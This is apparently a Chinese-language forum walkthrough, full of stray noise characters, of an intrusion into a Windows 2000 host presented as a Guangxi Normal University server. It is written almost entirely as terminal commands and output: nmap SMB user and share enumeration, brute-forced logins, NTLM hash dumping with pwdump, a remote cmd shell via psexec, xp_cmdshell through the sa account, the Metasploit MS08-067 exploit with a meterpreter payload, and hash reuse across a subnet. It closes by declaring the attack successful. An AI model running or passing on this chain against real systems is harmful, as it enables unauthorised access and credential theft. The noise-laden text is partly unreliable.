广西师范网站http://202.103.242.241/" f6 t: S7 t7 B5 ~/ O0 }
/ f& [, h, J i+ b: k3 K6 t8 Y2 w2 rroot@bt:~# nmap -sS -sV 202.103.242.241
: m% e* A( J7 R" u. P" j
5 } q* a u7 K0 r# z, n; UStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST6 ^! E: e1 M; T, L/ h; k
# N# k7 ^- c. V, YNmap scan report for bogon (202.103.242.241)- d+ r# E9 G( d, ]# L/ [
- o9 |- T I) F/ I8 K p; x' @Host is up (0.00048s latency).
( r; |/ V: A/ H
- H- X3 V! V& K/ `/ w# jNot shown: 993 closed ports; W7 x, ]+ I4 q6 X& A5 `
, t! g6 V3 z; `' s! C* hPORT STATE SERVICE VERSION
: d3 l1 `$ x! r
# d3 d- j) B. H5 U135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)) T B6 n2 w5 \* |+ u+ y* W
6 E1 p7 x- ^: Z% d1 P
139/tcp open netbios-ssn
: T8 m+ o$ Q3 M7 K/ |1 y) i- `4 Q. h7 s0 B, X
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
/ \- w5 N! C* ]& [6 Z& h& d8 E* S1 p. I* [, }: O
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
/ |9 T2 k- M7 i) x) m* g' {7 A+ [% y! J) q
1026/tcp open msrpc Microsoft Windows RPC
0 \4 ?: J0 E F t9 f' T1 i% e7 P2 X: e+ V; J
3372/tcp open msdtc?
1 H( ~. G, @; D( {8 w* d: m* V
0 U' y, d4 W6 d- o3389/tcp open ms-term-serv?1 N( x* e% G! b4 U, j- [
7 d- l9 A4 G+ l* O. {& o+ U0 C
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :8 h9 T+ W5 n4 |
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
/ @5 X3 s+ \6 E% w
9 t0 ~! _. o& k3 r% u( z bSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions) u/ v6 ^' y/ O' U, W1 n4 } q$ _
2 F' H) T0 G3 H6 p+ JSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
$ n! D& V4 K f5 b) O( U
4 A, d S, g/ A3 m: ~/ KSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO7 y9 U+ E7 B" F( o+ L
; B+ L+ |3 @1 v. PSF:ptions,6,”hO\n\x000Z”);
$ X6 G! Y& k; g; d
8 \( W: S, H* Z' U# u% M2 d# ?MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
9 ]% ^3 w& p; Q0 V! p( c0 G+ H: u1 X' p2 P& J8 @
Service Info: OS: Windows
3 Y# V" @8 t0 @" u1 u+ K& W/ V/ R0 A9 x
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
& w# e; O7 i* o$ ~5 L5 K) z9 X9 o. V5 j& E! T
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
0 s, V; y- l6 R7 o( J$ R! Z
# E1 P. x4 q4 p/ ^. ~; R5 F2 u0 e7 vroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本; \1 B0 }( h O" b3 J
`2 V: k2 R9 i4 Y+ f
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse1 o e" a9 V7 g6 s* q
3 Z2 P: @: Y$ o* J0 z6 Z
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
/ p N8 R" v$ F5 ?2 ]* d, P( o+ b( W# }6 t' a
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
5 ^/ z0 X3 r$ R% \# Y7 B
* [7 P; y; h7 L9 A2 k) v7 |3 X-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse* Q# e5 o) P5 z' o0 g5 v# _
' C. ^. _& s u N" ~, x-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
7 B( W8 } _: [$ {
0 M4 L1 } O& p" z2 x# f-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse1 N1 Z+ X" N: f9 |
3 V) y0 e0 ]- {-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
- E( M1 h% e8 _. y; x3 `3 [- t6 K
( V$ x* |( K$ c-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse* c, J2 f6 t5 N( c9 L( V
' F* t% D y! |3 U; C& }
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse7 a4 F" u' d9 m2 |1 H
! W# H+ p7 D. J, H+ ?
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse! e$ |' E% T4 c9 @4 c0 \- M
% D* ]. _9 m# ]2 M% K-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse0 {* O' \1 z2 z! }( |9 t5 p# c
) m- _# t( g& s
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
) ?& y* T' N$ d8 } U6 k1 n# L2 j4 k; ?. p$ Q9 M8 ?
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse/ [) r6 }9 A& [; f
* @. o, B2 j% Z' b-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
) J# U. `0 J! @, L/ f# v0 D
* c/ J9 D% e7 u4 A9 A* S-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
u2 E+ D3 A2 s0 ~8 [5 C% C0 x: I9 T0 o7 x9 r- Q/ R7 `! e( z$ O% p* e
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 ) K( f' M2 W F9 m, Y2 {; q$ R
/ S! ~' |+ O7 Z0 l) f//此乃使用脚本扫描远程机器所存在的账户名
- V0 V6 A) z8 S" b F0 `1 H% l5 s7 W3 A; {
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST* r8 r% l+ k. U' r% r
% a" x8 u. A" _- v9 t' A) b+ F) u1 _Nmap scan report for bogon (202.103.242.241)
# r+ Q" i* S, d0 m- R4 d* C9 u: ^5 p/ J
Host is up (0.00038s latency).0 H* [$ |: ~: J/ ^
* A0 C9 ?/ Q5 U1 G3 B, r3 u5 x
Not shown: 993 closed ports
$ x, v+ J8 m6 A; a) \" F! ?. W" q1 Z. K+ B
PORT STATE SERVICE
& [$ r5 ^ \; @# w* m
1 M7 a7 N# v3 R6 `2 d135/tcp open msrpc
$ p+ d+ \0 N# {2 c8 L7 l
3 [+ m, j' W- q7 O0 A. \139/tcp open netbios-ssn
+ R( }* w& r, o; L# Y8 n4 j& Q1 {
e& D& r2 H$ o$ ]7 ]1 `( Q445/tcp open microsoft-ds2 W0 O: h! M! u
( {% U4 ~$ s: }. H: B
1025/tcp open NFS-or-IIS
3 [# E: m( q4 T3 g: r
6 g7 W, w. J+ a# `$ t1026/tcp open LSA-or-nterm* d4 e# _0 V! B2 j" V* q# M; Z' t) J
# g3 _& {) F3 J: V$ V! j; E
3372/tcp open msdtc. d* t6 [9 L* N# v
! Y: ~# [. D# M& m9 J/ d* P: w3 |3389/tcp open ms-term-serv
' u( f2 h/ Q1 B6 y5 T
' i5 q/ W2 e" mMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
, F9 `. \" N; Y f; O" X! O. e) O( ^
Host script results:% S1 c& u2 d5 |' J
9 h7 z7 ~( V7 o/ m. l* Q6 k| smb-enum-users:
, P" ]6 C* G/ @) h; Z
; d' k* j5 J2 a! @+ o|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果9 i( B- o( V( S
( C+ [" \+ P, P9 D4 lNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
) K# F! L6 v1 o/ p! `
( L: w/ ?) l9 S& m9 vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 ( k) B4 ]( k* |0 u# T7 X7 u
' K% H* L" ?" }3 T0 F; H6 C" Z
//查看共享
+ Q9 T7 B: W$ Q! S$ h: }* m& [# T- ]" I. L2 n7 v b' h: k
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
3 O! F- j3 A4 m1 D2 e# O% U T, S0 U. z
Nmap scan report for bogon (202.103.242.241)0 o8 a- C. z: {% X
. t$ e9 Y8 a! N; i7 CHost is up (0.00035s latency).. @3 m+ c \1 \8 h
0 Q6 U+ G$ O4 x( FNot shown: 993 closed ports+ ?% {6 R4 P, F. q3 v
& E/ J9 n6 z0 D) P" M& \
PORT STATE SERVICE
% F' O" y- a' T0 s, M& S' k8 {, O( u$ E7 H3 y- |) }! s( q
135/tcp open msrpc- @' |7 C; m# o& H# [
" _7 s9 ^" `1 e# h139/tcp open netbios-ssn
7 D; c- B' Z# L) Q" |/ O& b7 a; l: [ D6 k0 c. x
445/tcp open microsoft-ds8 @; M+ A5 o; R' x8 q0 a2 Y
3 ^& c4 E8 |0 ^1025/tcp open NFS-or-IIS
# X4 O L1 T5 ]+ J/ t* T3 G& W1 F( \% r% o( s! G9 l# k4 [
1026/tcp open LSA-or-nterm/ j+ Q' z) l4 s0 T: a
$ e) E" Z! {4 q1 g* c3372/tcp open msdtc
3 C6 F, P" F. d3 m ^- A7 y/ v9 v/ z$ F$ I2 `% k
3389/tcp open ms-term-serv8 w1 l9 |: c. D( n8 S% M* V- J
, }( u1 X$ |; E
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)( N* z8 C' G% V9 v
' v* r. d- B0 Z& W) Y' q; e
Host script results:' Y/ V, z0 R8 o# O( K
# o' G" @0 J" p: i* w' @$ r| smb-enum-shares:
* ?. ?/ P1 z5 Y3 y6 @/ u% b
9 ~4 x8 T( r: Z2 v- ?; j| ADMIN$( D0 D. A; u2 ~$ b; A ~+ j
6 I: {' r% y$ q
| Anonymous access: <none>0 p' Y* r: \& |: e8 f' l
; ^6 M/ F+ Q! _7 \$ q
| C$
0 \ j% g( r4 A4 _# I2 j# p8 K5 f3 U& ^$ V; W) A; w
| Anonymous access: <none>6 u A+ `+ T1 |3 G, h( [
- d1 s ^5 N7 m' h7 I
| IPC$
* X' }( T6 N: M; g; k0 R C5 G. G/ Z- j% ^
|_ Anonymous access: READ: n8 R" z! J" z6 e
) z1 _9 z8 G; W6 e, I( q8 T
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds$ E. C) F& c R: |) y7 G7 X
0 @3 b3 A9 V# ^7 @
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 4 h$ W7 b3 z* K3 p- s
0 d: @0 x+ m& F- Q2 f( M//获取用户密码+ q5 U) q; o0 h5 s5 I# w: z
7 v( G* `9 J: f! L+ B1 T
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST! _( q/ p9 C$ Q# |
, n3 _) H& P* RNmap scan report for bogon (202.103.242.2418)
. e7 U6 ]9 W1 Y7 X2 c+ F4 a+ T5 ~; g' _6 R% L$ u) k
Host is up (0.00041s latency).
5 H8 j1 r9 b r7 C+ k; r; n% N1 [) Y8 s. U
Not shown: 993 closed ports7 ]! U6 Q6 q+ ^; S0 X8 }0 c/ @& j9 X
9 `) ]# Z9 C* O1 p: P$ @+ k/ r
PORT STATE SERVICE9 u# K* }7 W7 i- x8 n! Q
# P t0 a, d% K. i/ P+ m2 ?& A; Q135/tcp open msrpc
# B# S8 R9 p. |6 w* K. b
0 w! d# S& F0 H0 j- @5 N139/tcp open netbios-ssn
9 Y+ g% ^5 j X; y& I8 _. F2 \- i
445/tcp open microsoft-ds3 b- T2 y% z0 w/ C/ ]
' h$ T! D, O4 i$ {; ?- A: A1025/tcp open NFS-or-IIS
* l( Z7 e7 q% ^' e0 G2 L' E% e1 I) I" i
1026/tcp open LSA-or-nterm
5 R% ?- u: Q0 D! ]" Z0 g
; j7 c' G9 p0 ^: ?3372/tcp open msdtc/ q) g" x0 Y) J5 w
7 U- _/ w- e; z/ B- n x
3389/tcp open ms-term-serv
1 [( \7 a9 s% f) c3 O/ {. X8 d- a& z3 k: h
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems). ^# q% P! H- A( W
7 V6 n4 t" O4 y# VHost script results:
- d+ B0 D. P! E5 N7 y' z, h
2 N% ]. @$ B, O' ?| smb-brute:
( ~3 y' I# y' T! Y
( ]& w+ t8 z% Q% a: j1 g, qadministrator:<blank> => Login was successful, f3 \+ p6 g8 F
+ D% p" k/ e9 | V' O+ d
|_ test:123456 => Login was successful
) e( U" R2 c1 f e9 Y; w: d
( J& h4 H+ k" d. M5 y# S: XNmap done: 1 IP address (1 host up) scanned in 28.22 seconds) n, D# |1 G a/ {; J$ E
9 d; |: y/ }7 o0 J+ I& s. croot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
" _( L. q1 N2 M! ?1 K, v! w# R9 Q8 N% `& {' D+ A) ?
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
/ b. @! t% Z; M6 t$ [% W5 T( G+ |8 [8 ~7 i- k4 [: c( @' D
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
+ D2 z/ {8 W6 m$ {. {3 L9 \: ]( k
; V7 g$ u. O6 t7 F% Qroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
) @# i; O6 o- L- ?3 j$ M
& r" }- V7 a+ K) x, k& w8 ^Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
" R' }. R+ L7 P% ?6 W/ L1 i* I; r8 |! W0 p* v6 r- U" c
Nmap scan report for bogon (202.103.242.241)
/ \) ~! c8 f! D" ]0 m: Y0 z5 |, ^
Host is up (0.0012s latency)./ p: r& I K9 T! m8 j3 X/ O5 r- Z* M# @
! \, U, I) k1 G$ r9 E& l
PORT STATE SERVICE# A- N. m* \& i: D+ Q! c. b
7 L$ ^' E/ q1 [, A2 i
135/tcp open msrpc. Q# T/ M, F& \$ b
( q% Q) k3 Z/ ]/ M0 r$ K/ n
139/tcp open netbios-ssn" e l$ G, v6 O8 D" O- v% @
0 V+ I* J0 Z: r445/tcp open microsoft-ds
5 |* K! U/ Q) T8 c9 p `, m2 [5 ~! d+ i$ w9 ?3 }9 u
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)- h" ^, t U) o0 `2 o. c* ?
/ B4 c* _; j7 ~0 \2 H: G4 |* nHost script results:
' l' W( z3 \2 Z) s7 `4 S9 _/ c& r- u8 z7 b: Z7 M' ]2 A, _
| smb-pwdump:
( F, P1 O" q. e r! f. \
m+ \% ~, `4 p) i| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************8 a+ Y8 n4 E; o, W+ K. O6 p% }
5 D/ E4 r; a% ~- L4 O6 m; t- c- s
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************6 I3 [, Q; G% m0 d+ Y% K N: x
7 E2 B( i1 b- `; M9 D9 k, u
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4" h t+ ^! N( e% y8 K: h
% @ C7 U: \7 {$ Q, a
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D29 G+ c6 S/ R) X9 q3 b+ D! t |
, X+ T* u* A! n' a. z" l. ~) M0 `
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds+ j& H$ V. I0 [7 D+ s0 y
]6 J" \3 g! v8 c8 K. l3 n
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell/ |* e, ]! m6 ]6 p% ~. @+ h
9 X+ {# e( F- r% ~* ^2 a( n6 r0 o
-p 123456 -e cmd.exe/ {: `& b$ e" \8 M: X# w, l
2 h X+ e: ~/ j' g7 n# r% xPsExec v1.55 – Execute processes remotely* p1 \) U! `- Q* u+ J
1 X) ]$ j' y! ^: {6 X2 m
Copyright (C) 2001-2004 Mark Russinovich
+ {8 b% v6 y& y0 b2 `4 r: ^7 H% R3 ~4 }( @- p- L7 l7 G, {
Sysinternals – www.sysinternals.com
: p. B4 a( T9 c5 A, F; E% |2 f" R0 O7 w0 Q( w t: v: \6 E
Microsoft Windows 2000 [Version 5.00.2195]
+ F* G7 J1 H' e: r( C
) F7 O! b c/ c4 @5 W0 {+ U(C) 版权所有 1985-2000 Microsoft Corp.
* t0 N( @9 u5 r5 A7 M H% ?' ?, k: f9 p0 R
C:\WINNT\system32>ipconfig J5 F" O5 l# q* A( u; V
3 I2 n: ^2 k1 C3 i6 dWindows 2000 IP Configuration; p! A0 P( V% e% S9 {
, L5 e9 t s8 j3 k/ g$ X6 w
Ethernet adapter 本地连接:9 G7 n$ i' `: v8 `' q3 f) j
& m* w( F- f# n, r
Connection-specific DNS Suffix . :
O/ k4 H5 y0 M0 N0 f/ j! g' s* ^4 |
; ?6 B7 A) g9 |% E4 f; N9 {IP Address. . . . . . . . . . . . : 202.103.242.241- k( {. M: _" ]0 F# S4 [
7 {( r& x" U. _7 U) ]7 N2 ISubnet Mask . . . . . . . . . . . : 255.255.255.0
4 M7 {8 h* g7 S; i4 r% f |2 ]- J7 B5 C
Default Gateway . . . . . . . . . : 202.103.1.1
: a" H0 A: F r9 |6 h$ K/ e' I) q- [4 b! |
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令% o8 `: H! L0 ~4 q- B# z/ v
4 v" X1 ] I. Z1 A( l4 s. broot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
' K M) b5 F9 J$ V& d
4 G+ H# d9 K& u- I( i' cStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST# Z6 b# @+ j* }) }5 G$ V L
9 ]( ]( A. _" v! I. ONmap scan report for bogon (202.103.242.241)
; }( \* R* B! M$ w7 s/ P1 H8 w6 ]0 \; p& A# k8 k
Host is up (0.00046s latency).
5 V9 F/ s7 I6 r& |
1 u6 C+ t- Q0 K r% ~Not shown: 993 closed ports
+ z- H, ]; \9 \$ y3 A' w" z4 M3 p% w
PORT STATE SERVICE
) ^. n) f6 T$ A9 B2 _; Q+ a: F5 V
: w* d' X0 f H+ ~, T! M0 k# ~135/tcp open msrpc
/ | y" F9 \$ o: b
" M6 p- q, \" `' n0 d139/tcp open netbios-ssn+ j* C, R9 S/ }% A# [
" U; ?; n3 M! ?7 Z# n445/tcp open microsoft-ds5 I* n* Q5 s7 D6 [" Z$ C
7 j, n! x6 P3 c8 T
1025/tcp open NFS-or-IIS
" a* e7 l! ^; x- g* m
% `0 z4 I1 g' X1026/tcp open LSA-or-nterm% P( j- o, \7 N0 `: ?9 M. f
6 n9 g7 Q F4 d' ~1 v! }
3372/tcp open msdtc
) q; o+ z$ S' G0 P% p- r) }. N, y& h
3389/tcp open ms-term-serv
. l! F4 A+ x8 R! Q' O/ J
2 l R% t. z' f: |" BMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)# x0 \ t+ ^' ]( i
$ ?5 F4 w5 n1 ~! OHost script results:
$ N" J* V8 Z) |1 M' X) ^/ y7 n0 W0 N4 s7 L3 g0 L
| smb-check-vulns:
]7 u( P w: U1 {
) U9 ]. X) z# ?: z/ ||_ MS08-067: VULNERABLE8 X4 l4 l0 K+ i0 H* F; G
, I+ R0 {# A* v/ |. r
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
" B. g) S# a* d3 ?$ k( g0 M* v2 I; A# p0 D
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出2 K3 j1 j% J8 ]* _
: j6 E5 ?! i& `% |msf > search ms08# o# O4 F' U9 x6 `5 x
- o+ Y" F) m; W( Z4 _; nmsf > use exploit/windows/smb/ms08_067_netapi
7 A8 }- D6 a6 S* d' }3 p: S9 F- c7 E# }! Q+ C4 h
msf exploit(ms08_067_netapi) > show options6 I0 u4 k3 P' Z: U4 y
& w) H/ y9 }# p* p) T& H5 y
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.2415 S; S+ n" F# N, m! }6 F: ?; B& r
" U! Z. m2 b: N& j& b& mmsf exploit(ms08_067_netapi) > show payloads
; @8 Y) N& z4 v0 b% Z; g# Z! j% v) [! ]4 O
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
! O% B9 A6 \" T r: h
& c. k$ _& Y* f/ s) h) hmsf exploit(ms08_067_netapi) > exploit0 r7 P1 u7 N& p+ M
$ Y L! y( Q& s% a4 h# T2 Vmeterpreter >% t( a5 p: b8 D: U
5 k! b- C: U! Y& ^' Z
Background session 2? [y/N] (ctrl+z)
) a% E: h# K" [+ b- {; t/ M+ c6 {' I% c- l/ a) N I3 q7 p z8 y* T
msf exploit(ms08_067_netapi) > sessions -l, M2 J* {$ s' k, z, a
" J0 [* s$ X" q; L' `* `5 Z7 I
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt" [+ B5 B2 c+ z0 g- a
- v. K/ r7 ]7 B5 V; k+ T
test5 I+ }: n6 T% {# n9 l
. f4 l9 B3 b" ~% K2 m; W
administrator: w- ^0 B' t1 p" I
; i% E# c- ^+ j i" R) e1 ~& xroot@bt:/usr/local/share/nmap/scripts# vim password.txt; i' p, P- p& s$ \! q! U
, c4 q- H& C: r, B$ `
44EFCE164AB921CAAAD3B435B51404EE
$ ]) _7 w( K; m0 k ^/ H
( h. Q% \& G* j" \root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 " |1 h1 u+ Q2 L- w$ [! y- M5 ]' E6 X
9 Y: r2 G4 f5 V
//利用用户名跟获取的hash尝试对整段内网进行登录
% J" G+ ]. E9 H/ e' L/ l" ]$ X6 k5 p4 o7 ?4 a5 r6 M6 ~, ~7 v
Nmap scan report for 192.168.1.105. { B6 {. b7 q9 w( e8 M, L3 d. I
; }% b' E- P% F- R+ N9 B) jHost is up (0.00088s latency).. u" H* ^) l% Y* i J/ V: P5 W& d
' G' s, \) l& ^4 W1 L3 T) G
Not shown: 993 closed ports
' a& T) g) U. g$ S o8 j! A' a6 a1 X0 P8 N% V% r
PORT STATE SERVICE' b& Z) x2 ~ A ~* C, N: g
/ s" E: g0 i" _135/tcp open msrpc
n& `! W" A! W
0 k! E0 _+ G( {* a' e139/tcp open netbios-ssn
4 ^; Z$ q% Q) u: U7 }. l- w7 ^: T
0 z/ ?. M5 M- k Z6 s. r445/tcp open microsoft-ds! j% T) m0 c, y) J4 y) _
1 ^9 J2 B, E( v- [2 r" o! A1025/tcp open NFS-or-IIS
! H3 G( t/ `3 X( U& _& Q* n- ^+ g" `+ i% _3 o
1026/tcp open LSA-or-nterm
: }5 K s# T. U; @ a* F* v
! z/ C( S0 q# T: M+ u3 l( ^' r3372/tcp open msdtc4 R. k7 l# d; g5 X, f
- e9 E1 {8 J& ^ p: ^9 M3389/tcp open ms-term-serv
# ]$ _* w* _# m; e. W9 s Y3 `5 h# ~! t
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
( a4 S! l# I( F; q7 l3 f1 q! T. h, {# b/ v' w9 {3 c
Host script results:, o/ g9 t& ~! l' B8 ]
5 F9 s5 ` v5 o/ F3 S| smb-brute:
* n+ Q5 i! \/ E* b1 x
" w9 W9 t0 B$ u d1 Z" l|_ administrator:<blank> => Login was successful+ _' ~# b' J! {9 v6 f y7 d
% s5 b7 x# V+ n2 Z" ~4 K
攻击成功,一个简单的msf+nmap攻击~~· \5 e) _# }* q/ e
+ {" p# I% {" P0 b+ ^' Y+ H |